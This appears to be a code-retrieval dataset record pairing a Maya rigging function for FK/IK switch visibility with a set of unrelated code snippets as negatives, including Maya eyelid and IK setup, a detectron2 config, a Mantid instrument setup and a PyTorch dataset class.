mc.getAttr(node) if mode: mode = mode.lower() if 'ik' in mode: iks.append(node.split('.')[0]) if 'fk' in mode: fks.append(node.split('.')[0]) for ik in iks: # ikparpar=utils.get_parent(ik) ikpar = utils.get_parent(ik) if ikpar is None: mc.connectAttr(switch_anim + '.FK_IK', ik + '.visiblity', f=1) else: mc.connectAttr(switch_anim + '.FK_IK', ikpar + '.visibility', f=1) rvn = mc.createNode('reverse', name=switch_anim + '_fkik_vis_rv') mc.connectAttr(switch_anim + '.FK_IK', rvn + '.inputX') for fk in fks: fkpar = utils.get_parent(fk) if fkpar: mc.connectAttr(rvn + '.outputX', fkpar + '.visibility', f=1) if add_attrs is not None: for att in add_attrs: mc.addAttr(switch_anim, ln=att, min=0, max=1, dv=0, k=1) nns = [] for nn in reversed(newnodes): nnn = '' sn = nn.split("|") nnn = mc.rename(nn, sn[-1]) nns.append(nnn) anim = mc.ls(partpre + '_CTL') # if mc.objExists (partpre+'_skeleton_grp'): # mc.parent (anim, partpre+'_skeleton_grp' ) return anim
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def switch_setup(params, rig, ik_joints):\n\n # Duplicate for bind skeleton\n skeleton = [x.name() for x in params['ikSkeleton']]\n bind_skeleton = cmds.duplicate(skeleton, n=skeleton[0] + '_bnd_0')\n #bind_skeleton\n\n # Hide all attribute on Controller\n fkikcontrol = params['fkIkSwitch'].name()\n attrs = ['tx', 'ty', 'tz', 'rx', 'ry', 'rz', 'sx', 'sy', 'sz', 'v']\n for i in attrs:\n cmds.setAttr('{node}.{attr}'.format(node=fkikcontrol, attr=i), k=False, cb=False)\n\n # Create FK/IK Switch attributes\n cmds.addAttr(fkikcontrol, sn='FKIKBlend', at='float', min=0, max=1, dv=0, k=True)\n cmds.addAttr(fkikcontrol, sn='AutoVis', at='bool', dv=1, k=True)\n cmds.addAttr(fkikcontrol, ln='FKVis', at='bool', dv=1, k=True)\n cmds.addAttr(fkikcontrol, ln='IKVis', at='bool', dv=1, k=True)\n\n # create control offset transforms\n # par = cmds.listRelatives(fkikcontrol, parent=True)\n # buf = create_offset_transform(fkikcontrol, BUF)\n # cmds.parent(fkikcontrol, buf)\n # if par: cmds.parent(buf, par[0])\n\n # Parent Skeleton to rig group\n ik_skeleton = [x.name() for x in params['ikSkeleton']]\n fk_skeleton = [x.name() for x in params['fkSkeleton']]\n cmds.parent(ik_skeleton[0], rig['rigGroup'])\n cmds.parent(fk_skeleton[0], rig['rigGroup'])\n\n # Constraint Bind Skeleton\n fk_ik_finish(ik_joints, bind_skeleton, params)", "def _set_attr(self):\n self.as_skeletal = self._import_as_skeleton()\n self.materials = self._import_materials()\n self.textures = self._import_textures()", "def init_from_file(self):\n self.src.load('start.00') \n self.oe1.load('start.01')\n #self.det.load('start.02')\n print('NOTE: variables loaded from start.00/start.01 files')", "def setup(args):\n cfg = get_cfg()\n add_imaterialist_config(cfg)\n cfg.merge_from_file(model_zoo.get_config_file(\"COCO-InstanceSegmentation/mask_rcnn_R_50_FPN_3x.yaml\"))\n cfg.merge_from_file(args.config_file)\n \n cfg.merge_from_list(args.opts)\n cfg.freeze()\n default_setup(cfg, args)\n # Setup logger for \"imaterialist\" module\n setup_logger(output=cfg.OUTPUT_DIR, distributed_rank=comm.get_rank(), name=\"imaterialist\")\n return cfg", "def setup_threeCtrl(lf_lidrails, rt_lidrails):\n # Declare control variables\n lf_up = ['lf_lid01_tp01_ccc', 'lf_lid01_tp02_ccc', 'lf_lid01_tp03_ccc']\n lf_dn = ['lf_lid01_dn01_ccc', 'lf_lid01_dn02_ccc', 'lf_lid01_dn03_ccc']\n rt_up = ['rt_lid01_tp01_ccc', 'rt_lid01_tp02_ccc', 'rt_lid01_tp03_ccc']\n rt_dn = ['rt_lid01_dn01_ccc', 'rt_lid01_dn02_ccc', 'rt_lid01_dn03_ccc']\n\n # Connect lidRails ramps to lid profile controls\n\n # ========\n # lf_up\n\n # inner\n cmds.connectAttr(lf_up[0] + '.tx', lf_lidrails + '.offsettop[0].offsettop_Position', f=True)\n cmds.connectAttr(lf_up[0] + '.ty', lf_lidrails + '.offsettop[0].offsettop_FloatValue', f=True)\n # mid\n lf_lid01_um01_adn = cmds.createNode('addDoubleLinear', n='lf_lid01_um01_addDoubleLinear')\n cmds.connectAttr(lf_up[1] + '.tx', lf_lid01_um01_adn + '.input1', f=True)\n cmds.setAttr(lf_lid01_um01_adn + '.input2', 0.5)\n cmds.connectAttr(lf_lid01_um01_adn + '.output', lf_lidrails + '.offsettop[1].offsettop_Position', f=True)\n cmds.connectAttr(lf_up[1] + '.ty', lf_lidrails + '.offsettop[1].offsettop_FloatValue', f=True)\n # outer\n lf_lid01_uo01_adn = cmds.createNode('addDoubleLinear', n='lf_lid01_uo01_addDoubleLinear')\n cmds.connectAttr(lf_up[2] + '.tx', lf_lid01_uo01_adn + '.input1', f=True)\n cmds.setAttr(lf_lid01_uo01_adn + '.input2', 1.0)\n cmds.connectAttr(lf_lid01_uo01_adn + '.output', lf_lidrails + '.offsettop[2].offsettop_Position', f=True)\n cmds.connectAttr(lf_up[2] + '.ty', lf_lidrails + '.offsettop[2].offsettop_FloatValue', f=True)\n\n # ========\n # lf_dn\n\n # Reverse node\n lf_dn_rvn = cmds.createNode('reverse', n='lf_lid01_dn01_reverse')\n # inner\n cmds.connectAttr(lf_dn[0] + '.tx', lf_lidrails + '.offsetbottom[0].offsetbottom_Position', f=True)\n cmds.connectAttr(lf_dn[0] + '.ty', lf_dn_rvn + '.inputX', f=True)\n cmds.connectAttr(lf_dn_rvn + '.outputX', lf_lidrails + '.offsetbottom[0].offsetbottom_FloatValue', f=True)\n # mid\n lf_lid01_dm01_adn = cmds.createNode('addDoubleLinear', n='lf_lid01_dm01_addDoubleLinear')\n cmds.connectAttr(lf_dn[1] + '.tx', lf_lid01_dm01_adn + '.input1', f=True)\n cmds.setAttr(lf_lid01_dm01_adn + '.input2', 0.5)\n cmds.connectAttr(lf_lid01_dm01_adn + '.output', lf_lidrails + '.offsetbottom[1].offsetbottom_Position', f=True)\n cmds.connectAttr(lf_dn[1] + '.ty', lf_dn_rvn + '.inputY', f=True)\n cmds.connectAttr(lf_dn_rvn + '.outputY', lf_lidrails + '.offsetbottom[1].offsetbottom_FloatValue', f=True)\n # outer\n lf_lid01_do01_adn = cmds.createNode('addDoubleLinear', n='lf_lid01_do01_addDoubleLinear')\n cmds.connectAttr(lf_dn[2] + '.tx', lf_lid01_do01_adn + '.input1', f=True)\n cmds.setAttr(lf_lid01_do01_adn + '.input2', 1.0)\n cmds.connectAttr(lf_lid01_do01_adn + '.output', lf_lidrails + '.offsetbottom[2].offsetbottom_Position', f=True)\n cmds.connectAttr(lf_dn[2] + '.ty', lf_dn_rvn + '.inputZ', f=True)\n cmds.connectAttr(lf_dn_rvn + '.outputZ', lf_lidrails + '.offsetbottom[2].offsetbottom_FloatValue', f=True)\n\n # ========\n # rt_up\n\n # inner\n rt_lid01_ui01_asn = cmds.createNode('plusMinusAverage', n='rt_lid01_ui01_plusMinusAverage')\n cmds.setAttr(rt_lid01_ui01_asn + '.operation', 2)\n cmds.setAttr(rt_lid01_ui01_asn + '.input1D[0]', 1.0)\n cmds.connectAttr(rt_up[0] + '.tx', rt_lid01_ui01_asn + '.input1D[1]', f=True)\n cmds.connectAttr(rt_lid01_ui01_asn + '.output1D', rt_lidrails + '.offsettop[2].offsettop_Position', f=True)\n cmds.connectAttr(rt_up[0] + '.ty', rt_lidrails + '.offsettop[2].offsettop_FloatValue', f=True)\n # mid\n rt_lid01_um01_mdn = cmds.createNode('multDoubleLinear', n='rt_lid01_um01_multDoubleLinear')\n rt_lid01_um01_adn = cmds.createNode('addDoubleLinear', n='rt_lid01_um01_addDoubleLinear')\n cmds.connectAttr(rt_up[1] + '.tx', rt_lid01_um01_mdn + '.input1', f=True)\n cmds.setAttr(rt_lid01_um01_mdn + '.input2', -1.0)\n cmds.connectAttr(rt_lid01_um01_mdn + '.output', rt_lid01_um01_adn + '.input1', f=True)\n cmds.setAttr(rt_lid01_um01_adn + '.input2', 0.5)\n cmds.connectAttr(rt_lid01_um01_adn + '.output', rt_lidrails + '.offsettop[1].offsettop_Position', f=True)\n cmds.connectAttr(rt_up[1] + '.ty', rt_lidrails + '.offsettop[1].offsettop_FloatValue', f=True)\n # outer\n rt_lid01_uo_mdn = cmds.createNode('multDoubleLinear', n='rt_lid01_uo_multDoubleLinear')\n cmds.connectAttr(rt_up[2] + '.tx', rt_lid01_uo_mdn + '.input1', f=True)\n cmds.setAttr(rt_lid01_uo_mdn + '.input2', -1.0)\n cmds.connectAttr(rt_lid01_uo_mdn + '.output', rt_lidrails + '.offsettop[0].offsettop_Position', f=True)\n cmds.connectAttr(rt_up[2] + '.ty', rt_lidrails + '.offsettop[0].offsettop_FloatValue', f=True)\n\n # ========\n # rt_dn\n\n # Reverse node\n rt_dn_rvn = cmds.createNode('reverse', n='rt_lid01_dn01_reverse')\n # inner\n rt_lid01_di01_asn = cmds.createNode('plusMinusAverage', n='rt_lid01_di01_plusMinusAverage')\n cmds.setAttr(rt_lid01_di01_asn + '.operation', 2)\n cmds.setAttr(rt_lid01_di01_asn + '.input1D[0]', 1.0)\n cmds.connectAttr(rt_dn[0] + '.tx', rt_lid01_di01_asn + '.input1D[1]', f=True)\n cmds.connectAttr(rt_lid01_di01_asn + '.output1D', rt_lidrails + '.offsetbottom[0].offsetbottom_Position', f=True)\n cmds.connectAttr(rt_dn[0] + '.ty', rt_dn_rvn + '.inputX', f=True)\n cmds.connectAttr(rt_dn_rvn + '.outputX', rt_lidrails + '.offsetbottom[0].offsetbottom_FloatValue', f=True)\n # mid\n rt_lid01_dm01_asn = cmds.createNode('plusMinusAverage', n='rt_lid01_dm01_plusMinusAverage')\n cmds.setAttr(rt_lid01_dm01_asn + '.operation', 2)\n cmds.setAttr(rt_lid01_dm01_asn + '.input1D[0]', 0.5)\n cmds.connectAttr(rt_dn[1] + '.tx', rt_lid01_dm01_asn + '.input1D[1]', f=True)\n cmds.connectAttr(rt_lid01_dm01_asn + '.output1D', rt_lidrails + '.offsetbottom[1].offsetbottom_Position', f=True)\n cmds.connectAttr(rt_dn[1] + '.ty', rt_dn_rvn + '.inputY', f=True)\n cmds.connectAttr(rt_dn_rvn + '.outputY', rt_lidrails + '.offsetbottom[1].offsetbottom_FloatValue', f=True)\n # outer\n rt_lid01_do01_mdn = cmds.createNode('multDoubleLinear', n='rt_lid01_do01_multDoubleLinear')\n cmds.connectAttr(rt_dn[2] + '.tx', rt_lid01_do01_mdn + '.input1', f=True)\n cmds.setAttr(rt_lid01_do01_mdn + '.input2', -1.0)\n cmds.connectAttr(rt_lid01_do01_mdn + '.output', rt_lidrails + '.offsetbottom[2].offsetbottom_Position', f=True)\n cmds.connectAttr(rt_dn[2] + '.ty', rt_dn_rvn + '.inputZ', f=True)\n cmds.connectAttr(rt_dn_rvn + '.outputZ', rt_lidrails + '.offsetbottom[2].offsetbottom_FloatValue', f=True)", "def __init__(self, yaml_file = 'options_modeling.yaml'):\n\n self.reproj_th = 2.5\n self.min_matched_views = 3\n self.descriptors = {'SIFT': 'sift'} # Descriptor name and module name\n self.mask_suffix = '*_mask.png'\n \n # If there is an options file, it will overwrite the defaults \n if yaml_file is not None:\n self.load(yaml_file)", "def connectControl(*args, fileName: bool=True, index: int=0, preventContextualMenu: bool=True,\n preventOverride: bool=True, **kwargs)->None:\n pass", "def setup_fourCtrl(lf_lidrails, rt_lidrails):\n # Declare control variables\n lf_up = ['L_upperLid1_ctrl', 'L_upperLid2_ctrl', 'L_upperLid3_ctrl', 'L_upperLid4_ctrl']\n lf_dn = ['L_lowerLid1_ctrl', 'L_lowerLid2_ctrl', 'L_lowerLid3_ctrl', 'L_lowerLid4_ctrl']\n rt_up = ['R_upperLid1_ctrl', 'R_upperLid2_ctrl', 'R_upperLid3_ctrl', 'R_upperLid4_ctrl']\n rt_dn = ['R_lowerLid1_ctrl', 'R_lowerLid2_ctrl', 'R_lowerLid3_ctrl', 'R_lowerLid4_ctrl']\n\n # Connect lidRails ramps to lid profile controls\n\n # lf_up =========\n\n # inner\n cmds.connectAttr(lf_up[0] + '.tx', lf_lidrails + '.offsettop[0].offsettop_Position', f=True)\n cmds.connectAttr(lf_up[0] + '.ty', lf_lidrails + '.offsettop[0].offsettop_FloatValue', f=True)\n # mid - inner\n lf_lid01_um01_adn = cmds.createNode('addDoubleLinear', n='lf_lid01_um01_addDoubleLinear')\n cmds.connectAttr(lf_up[1] + '.tx', lf_lid01_um01_adn + '.input1', f=True)\n cmds.setAttr(lf_lid01_um01_adn + '.input2', 0.333)\n cmds.connectAttr(lf_lid01_um01_adn + '.output', lf_lidrails + '.offsettop[1].offsettop_Position', f=True)\n cmds.connectAttr(lf_up[1] + '.ty', lf_lidrails + '.offsettop[1].offsettop_FloatValue', f=True)\n # mid - outer\n lf_lid01_um02_adn = cmds.createNode('addDoubleLinear', n='lf_lid01_um02_addDoubleLinear')\n cmds.connectAttr(lf_up[2] + '.tx', lf_lid01_um02_adn + '.input1', f=True)\n cmds.setAttr(lf_lid01_um02_adn + '.input2', 0.666)\n cmds.connectAttr(lf_lid01_um02_adn + '.output', lf_lidrails + '.offsettop[2].offsettop_Position', f=True)\n cmds.connectAttr(lf_up[2] + '.ty', lf_lidrails + '.offsettop[2].offsettop_FloatValue', f=True)\n # outer\n lf_lid01_uo01_adn = cmds.createNode('addDoubleLinear', n='lf_lid01_uo01_addDoubleLinear')\n cmds.connectAttr(lf_up[3] + '.tx', lf_lid01_uo01_adn + '.input1', f=True)\n cmds.setAttr(lf_lid01_uo01_adn + '.input2', 1.0)\n cmds.connectAttr(lf_lid01_uo01_adn + '.output', lf_lidrails + '.offsettop[3].offsettop_Position', f=True)\n cmds.connectAttr(lf_up[3] + '.ty', lf_lidrails + '.offsettop[3].offsettop_FloatValue', f=True)\n\n # lf_dn =========\n\n lf_dn_rvn = cmds.createNode('reverse', n='lf_lid01_dn01_reverse')\n lf_dn02_rvn = cmds.createNode('reverse', n='lf_lid01_dn02_reverse')\n # inner\n cmds.connectAttr(lf_dn[0] + '.tx', lf_lidrails + '.offsetbottom[0].offsetbottom_Position', f=True)\n cmds.connectAttr(lf_dn[0] + '.ty', lf_dn_rvn + '.inputX', f=True)\n cmds.connectAttr(lf_dn_rvn + '.outputX', lf_lidrails + '.offsetbottom[0].offsetbottom_FloatValue', f=True)\n # mid - inner\n lf_lid01_dm01_adn = cmds.createNode('addDoubleLinear', n='lf_lid01_dm01_addDoubleLinear')\n cmds.connectAttr(lf_dn[1] + '.tx', lf_lid01_dm01_adn + '.input1', f=True)\n cmds.setAttr(lf_lid01_dm01_adn + '.input2', 0.333)\n cmds.connectAttr(lf_lid01_dm01_adn + '.output', lf_lidrails + '.offsetbottom[1].offsetbottom_Position', f=True)\n cmds.connectAttr(lf_dn[1] + '.ty', lf_dn_rvn + '.inputY', f=True)\n cmds.connectAttr(lf_dn_rvn + '.outputY', lf_lidrails + '.offsetbottom[1].offsetbottom_FloatValue', f=True)\n # mid - outer\n lf_lid01_dm02_adn = cmds.createNode('addDoubleLinear', n='lf_lid01_dm02_addDoubleLinear')\n cmds.connectAttr(lf_dn[2] + '.tx', lf_lid01_dm02_adn + '.input1', f=True)\n cmds.setAttr(lf_lid01_dm02_adn + '.input2', 0.666)\n cmds.connectAttr(lf_lid01_dm02_adn + '.output', lf_lidrails + '.offsetbottom[2].offsetbottom_Position', f=True)\n cmds.connectAttr(lf_dn[2] + '.ty', lf_dn02_rvn + '.inputX', f=True)\n cmds.connectAttr(lf_dn02_rvn + '.outputX', lf_lidrails + '.offsetbottom[2].offsetbottom_FloatValue', f=True)\n # outer\n lf_lid01_do01_adn = cmds.createNode('addDoubleLinear', n='lf_lid01_do01_addDoubleLinear')\n cmds.connectAttr(lf_dn[3] + '.tx', lf_lid01_do01_adn + '.input1', f=True)\n cmds.setAttr(lf_lid01_do01_adn + '.input2', 1.0)\n cmds.connectAttr(lf_lid01_do01_adn + '.output', lf_lidrails + '.offsetbottom[3].offsetbottom_Position', f=True)\n cmds.connectAttr(lf_dn[3] + '.ty', lf_dn02_rvn + '.inputY')\n cmds.connectAttr(lf_dn02_rvn + '.outputY', lf_lidrails + '.offsetbottom[3].offsetbottom_FloatValue', f=True)\n\n # rt_up =========\n\n # inner\n rt_lid01_ui01_asn = cmds.createNode('plusMinusAverage', n='rt_lid01_ui01_plusMinusAverage')\n cmds.setAttr(rt_lid01_ui01_asn + '.input1D[0]', 1.0)\n cmds.connectAttr(rt_up[0] + '.tx', rt_lid01_ui01_asn + '.input1D[1]', f=True)\n cmds.connectAttr(rt_lid01_ui01_asn + '.output1D', rt_lidrails + '.offsettop[3].offsettop_Position', f=True)\n cmds.connectAttr(rt_up[0] + '.ty', rt_lidrails + '.offsettop[3].offsettop_FloatValue', f=True)\n # mid -inner\n rt_lid01_um01_mdn = cmds.createNode('multDoubleLinear', n='rt_lid01_um01_multDoubleLinear')\n rt_lid01_um01_adn = cmds.createNode('addDoubleLinear', n='rt_lid01_um01_addDoubleLinear')\n cmds.connectAttr(rt_up[2] + '.tx', rt_lid01_um01_mdn + '.input1', f=True)\n cmds.setAttr(rt_lid01_um01_mdn + '.input2', -1.0)\n cmds.connectAttr(rt_lid01_um01_mdn + '.output', rt_lid01_um01_adn + '.input1', f=True)\n cmds.setAttr(rt_lid01_um01_adn + '.input2', 0.333)\n cmds.connectAttr(rt_lid01_um01_adn + '.output', rt_lidrails + '.offsettop[2].offsettop_Position', f=True)\n cmds.connectAttr(rt_up[2] + '.ty', rt_lidrails + '.offsettop[2].offsettop_FloatValue', f=True)\n\n # mid - outer\n rt_lid01_um02_mdn = cmds.createNode('multDoubleLinear', n='rt_lid01_um02_multDoubleLinear')\n rt_lid01_um02_adn = cmds.createNode('addDoubleLinear', n='rt_lid01_um02_addDoubleLinear')\n cmds.connectAttr(rt_up[1] + '.tx', rt_lid01_um02_mdn + '.input1', f=True)\n cmds.setAttr(rt_lid01_um02_mdn + '.input2', -1.0)\n cmds.connectAttr(rt_lid01_um02_mdn + '.output', rt_lid01_um02_adn + '.input1', f=True)\n cmds.setAttr(rt_lid01_um02_adn + '.input2', 0.666)\n cmds.connectAttr(rt_lid01_um02_adn + '.output', rt_lidrails + '.offsettop[1].offsettop_Position', f=True)\n cmds.connectAttr(rt_up[1] + '.ty', rt_lidrails + '.offsettop[1].offsettop_FloatValue', f=True)\n\n # outer\n rt_lid01_uo_mdn = cmds.createNode('multDoubleLinear', n='rt_lid01_uo_multDoubleLinear')\n cmds.connectAttr(rt_up[3] + '.tx', rt_lid01_uo_mdn + '.input1', f=True)\n cmds.setAttr(rt_lid01_uo_mdn + '.input2', -1.0)\n cmds.connectAttr(rt_lid01_uo_mdn + '.output', rt_lidrails + '.offsettop[0].offsettop_Position', f=True)\n cmds.connectAttr(rt_up[3] + '.ty', rt_lidrails + '.offsettop[0].offsettop_FloatValue', f=True)\n\n # rt_dn =========\n\n rt_dn_rvn = cmds.createNode('reverse', n='rt_lid01_dn01_reverse')\n rt_dn02_rvn = cmds.createNode('reverse', n='rt_lid01_dn02_reverse')\n # inner\n rt_lid01_di01_asn = cmds.createNode('plusMinusAverage', n='rt_lid01_di01_plusMinusAverage')\n cmds.setAttr(rt_lid01_di01_asn + '.operation', 2)\n cmds.setAttr(rt_lid01_di01_asn + '.input1D[0]', 1.0)\n cmds.connectAttr(rt_dn[0] + '.tx', rt_lid01_di01_asn + '.input1D[1]', f=True)\n cmds.connectAttr(rt_lid01_di01_asn + '.output1D', rt_lidrails + '.offsetbottom[0].offsetbottom_Position', f=True)\n cmds.connectAttr(rt_dn[0] + '.ty', rt_dn_rvn + '.inputX', f=True)\n cmds.connectAttr(rt_dn_rvn + '.outputX', rt_lidrails + '.offsetbottom[0].offsetbottom_FloatValue', f=True)\n # mid - inner\n rt_lid01_dm01_asn = cmds.createNode('plusMinusAverage', n='rt_lid01_dm01_plusMinusAverage')\n cmds.setAttr(rt_lid01_dm01_asn + '.operation', 2)\n cmds.setAttr(rt_lid01_dm01_asn + '.input1D[0]', 0.333)\n cmds.connectAttr(rt_dn[2] + '.tx', rt_lid01_dm01_asn + '.input1D[1]', f=True)\n cmds.connectAttr(rt_lid01_dm01_asn + '.output1D', rt_lidrails + '.offsetbottom[1].offsetbottom_Position', f=True)\n cmds.connectAttr(rt_dn[2] + '.ty', rt_dn_rvn + '.inputY', f=True)\n cmds.connectAttr(rt_dn_rvn + '.outputY', rt_lidrails + '.offsetbottom[1].offsetbottom_FloatValue', f=True)\n # mid - outer\n rt_lid01_dm02_asn = cmds.createNode('plusMinusAverage', n='rt_lid01_dm02_plusMinusAverage')\n cmds.setAttr(rt_lid01_dm02_asn + '.operation', 2)\n cmds.setAttr(rt_lid01_dm02_asn + '.input1D[0]', 0.666)\n cmds.connectAttr(rt_dn[1] + '.tx', rt_lid01_dm02_asn + '.input1D[1]', f=True)\n cmds.connectAttr(rt_lid01_dm02_asn + '.output1D', rt_lidrails + '.offsetbottom[2].offsetbottom_Position', f=True)\n cmds.connectAttr(rt_dn[1] + '.ty', rt_dn02_rvn + '.inputX', f=True)\n cmds.connectAttr(rt_dn02_rvn + '.outputX', rt_lidrails + '.offsetbottom[2].offsetbottom_FloatValue', f=True)\n # outer\n rt_lid01_do01_mdn = cmds.createNode('multDoubleLinear', n='rt_lid01_do01_multDoubleLinear')\n cmds.connectAttr(rt_dn[3] + '.tx', rt_lid01_do01_mdn + '.input1', f=True)\n cmds.setAttr(rt_lid01_do01_mdn + '.input2', -1.0)\n cmds.connectAttr(rt_lid01_do01_mdn + '.output', rt_lidrails + '.offsetbottom[3].offsetbottom_Position', f=True)\n cmds.connectAttr(rt_dn[3] + '.ty', rt_dn02_rvn + '.inputY', f=True)\n cmds.connectAttr(rt_dn02_rvn + '.outputY', rt_lidrails + '.offsetbottom[3].offsetbottom_FloatValue')", "def init():\n \n # General parameters\n vect_path = '/home/laura/Documents/STAGE3/outputVectorisation_1705_new_invert/output_60_70/' # graphs directory\n csv_path = '/home/laura/Documents/STAGE3/outputVectorisation_1705_new_invert/output_60_70/tracking3/nodes_for_tracking.csv' # csv file \n dest_path = '/home/laura/Documents/STAGE3/outputVectorisation_1705_new_invert/output_60_70/tracking3/' # output directory\n verbose = True\n main_params = [vect_path, csv_path, dest_path, verbose]\n \n # Linking parameters\n createCSV = True \n forced_matching = True\n search_range = 10\n memory = 3\n adaptive_stop = 5 \n link_params = [createCSV, forced_matching, search_range, memory, \n adaptive_stop]\n \n # Tracking check parameters\n check = True # True to create a check image\n img_path = '/home/laura/Documents/STAGE3/outputVectorisation_1705_new_invert/output_60_70/tracking2/MosaicTest_t070.jpg' # image file on which to draw\n size = 1 # size of the nodes drawing\n check_params = [check, img_path, size]\n \n return main_params, link_params, check_params", "def create_ik_setup(controls, joints):\n\n # Create control offset transforms\n exp_tf_ms = []\n for ctl in controls:\n par = cmds.listRelatives(ctl, parent=True)\n buf = create_offset_transform(ctl, BUF)\n exp = create_offset_transform(ctl, EXP)\n off = create_offset_transform(ctl, OFF)\n cmds.parent(ctl, off)\n cmds.parent(off, exp)\n cmds.parent(exp, buf)\n if par:\n cmds.parent(buf, par[0])\n exp_tf_ms.append(buf)\n\n root_control, pole_control, goal_control = controls\n handle, effector = cmds.ikHandle(sj=joints[0], ee=joints[-1], sol='ikRPsolver')\n cmds.setAttr('{}.hiddenInOutliner'.format(handle), True)\n cmds.orientConstraint(goal_control, joints[-1], mo=True)\n cmds.parent(handle, goal_control)\n cmds.hide(handle)\n\n # Connect root control to ik joint offset group\n ik_joints_offset = cmds.listRelatives(joints[0], p=True)[0]\n cmds.parentConstraint(root_control, ik_joints_offset, mo=True)\n cmds.scaleConstraint(root_control, ik_joints_offset, mo=True)\n\n # Connect twisting and pole vector control\n cmds.addAttr(goal_control, ln='twist', at='float', k=True)\n cmds.connectAttr('{}.twist'.format(goal_control), '{}.twist'.format(handle))\n cmds.poleVectorConstraint(pole_control, handle)\n\n # Add PV visibility attribute\n cmds.addAttr(goal_control, shortName='pv', longName='poleVector', at='bool', k=True)\n cmds.connectAttr('{}.pv'.format(goal_control), '{}.v'.format(pole_control))\n cmds.setAttr('{}.pv'.format(goal_control),1)\n\n # Add curve that points elbow to pole control\n crv = cmds.curve(p=[[0, 0, 0], [0, 1, 0]], d=1)\n cmds.connectAttr('{}.visibility'.format(pole_control), '{}.visibility'.format(crv))\n lock_hide_attrs(crv, attrs=['tx', 'ty', 'tz', 'rx', 'ry', 'rz', 'sx', 'sy', 'sz'])\n cmds.setAttr('{}.overrideEnabled'.format(crv), True)\n cmds.setAttr('{}.overrideDisplayType'.format(crv), 2)\n decomp_joint = cmds.createNode('decomposeMatrix')\n decomp_control = cmds.createNode('decomposeMatrix')\n cmds.connectAttr('{}.worldMatrix'.format(joints[1]), '{}.inputMatrix'.format(decomp_joint))\n cmds.connectAttr('{}.worldMatrix'.format(pole_control), '{}.inputMatrix'.format(decomp_control))\n cmds.connectAttr('{}.outputTranslate'.format(decomp_joint), '{}.controlPoints[0]'.format(crv))\n cmds.connectAttr('{}.outputTranslate'.format(decomp_control), '{}.controlPoints[1]'.format(crv))\n\n return handle, crv, exp_tf_ms", "def setup(instname):\n global reducer, inst_name,van_mass,bleed_switch,rate,pixels\n # debugging (allows to reload changed DirectEnergyConversion package from Mantid)\n\n if instname=='MAR' or instname=='mar':\n print 'setup mari'\n inst_name='MAR'\n reducer = DRC.setup_reducer('MARI')\n bleed_switch=False\n rate=0.0\n pixels=0\n elif instname=='MER' or instname=='mer':\n print 'setup merlin'\n inst_name='MER'\n reducer = DRC.setup_reducer('MERLIN')\n bleed_switch=True\n rate=0.01\n pixels=80\n elif instname=='MAP' or instname=='map':\n print 'setup maps'\n inst_name='MAP'\n reducer = DRC.setup_reducer('MAPS')\n bleed_switch=False\n rate=0.0\n pixels=0.0\n elif instname=='LET' or instname=='let':\n print 'setup let'\n inst_name='LET'\n reducer = DRC.setup_reducer('LET')\n bleed_switch=True\n rate=0.01\n pixels=80\n elif instname=='ARCS' or instname=='arcs':\n print 'setup Arcs'\n inst_name='ARC'\n reducer = DRC.setup_reducer('ARCS')\n bleed_switch=False\n rate=0.01\n pixels=80\n elif instname=='SEQ' or instname=='seq':\n print 'setup Sequoia'\n inst_name='SEQ'\n reducer = DRC.setup_reducer('SEQUOIA')\n bleed_switch=False\n rate=0.01\n pixels=80\n elif instname=='CNCS' or instname=='cncs':\n print 'setup cncs'\n inst_name='SEQ'\n reducer = DRC.setup_reducer('CNCS')\n bleed_switch=False\n rate=0.01\n pixels=80\n elif instname=='HYSPEC' or instname=='hyspec':\n print 'setup hyspec'\n inst_name='SEQ'\n reducer = DRC.setup_reducer('HYSPEC')\n bleed_switch=False\n rate=0.01\n pixels=80\n else:\n print 'Instrument name not defined'\n return \n van_mass=reducer.get_default_parameter('vanadium-mass')", "def __init__(self, parent):\n super(Demo4, self).__init__(parent)\n self.scenes = []\n self.draw_axes = True\n self.lighting = True\n self.current_scene = 0\n self.objects = []\n self.diffuse_light = [0.8, 0.8, 0.8, 1]", "def __init__(self, cat_path, img_path, orig_json_path, rst_json_path,\n layers, **kwargs):\n\n # Initialize class attributes\n self.name = \"AI2D-RST\" # Dataset name\n self.cat_path = Path(cat_path) # Path to categories JSON\n self.img_path = Path(img_path) # Path to AI2D images\n self.orig_json_path = Path(orig_json_path) # Path to AI2D JSON\n self.rst_json_path = Path(rst_json_path) # Path to AI2D-RST JSON\n\n # Check input types\n assert self.cat_path.is_file()\n assert self.img_path.is_dir()\n assert self.orig_json_path.is_dir()\n assert self.rst_json_path.is_dir()\n assert layers in ['grouping', 'grouping+connectivity', 'connectivity',\n 'discourse', 'discourse+connectivity']\n\n # Load node and edge dictionaries\n self.node_dict = node_dicts\n self.edge_dict = edge_dicts\n\n # Load diagram labels from the labels JSON file\n categories = self._load_annotation(cat_path)\n\n # Initialize label encoder and encode integer labels\n le = LabelEncoder().fit(list(categories.values()))\n\n # Create a dictionary mapping encoded class integers to their names\n self.class_names = {k: v for k, v in zip(le.transform(le.classes_),\n le.classes_)}\n\n # Create a dictionary mapping filenames to labels\n label_dict = {k: le.transform([v]) for k, v in categories.items()}\n\n # Convert labels into a numpy array for calculating class weights\n label_arr = np.concatenate(list(label_dict.values()))\n\n # Calculate class weights\n class_weights = compute_class_weight(class_weight='balanced',\n classes=np.unique(label_arr),\n y=label_arr)\n\n # Wrap class weights into a torch Tensor and make available through\n # attribute\n self.class_weights = torch.FloatTensor(class_weights)\n\n # Get diagram identifiers and labels\n self.file_ids = list(label_dict.keys())\n self.labels = list(label_dict.values())\n\n # Return DGL graph objects by default\n self._return_nx = False\n\n # Check if NetworkX graphs have been requested\n if kwargs and 'nx' in kwargs:\n\n # Set the flag for returning NetworkX graphs to True\n if kwargs['nx']:\n \n self._return_nx = True\n\n # Check if node type information should be added to node features\n if kwargs and kwargs['node_types']:\n\n # Set add node types flag to True\n self._add_node_types = True\n\n # Check which node label dictionary to use: this depends on the kind\n # of annotation layers requested\n if 'discourse' in layers:\n\n # Get the node labels from the node dictionary & cast to array\n node_labels = list(self.node_dict['discourse'].values())\n node_labels = np.asarray(node_labels)\n\n else:\n\n # Get the node labels from the node dictionary & cast to array\n node_labels = list(self.node_dict['grouping'].values())\n node_labels = np.asarray(node_labels)\n\n # Initialize label binarizer and fit to node labels\n self._node_binarizer = LabelBinarizer().fit(node_labels)\n\n else:\n\n self._add_node_types = False\n\n # Check if smoothed labels have been requested\n if 'smooth' in kwargs and kwargs['smooth']:\n\n # Set the flag for smoothed labels to True\n self._smooth_labels = True\n\n else:\n\n 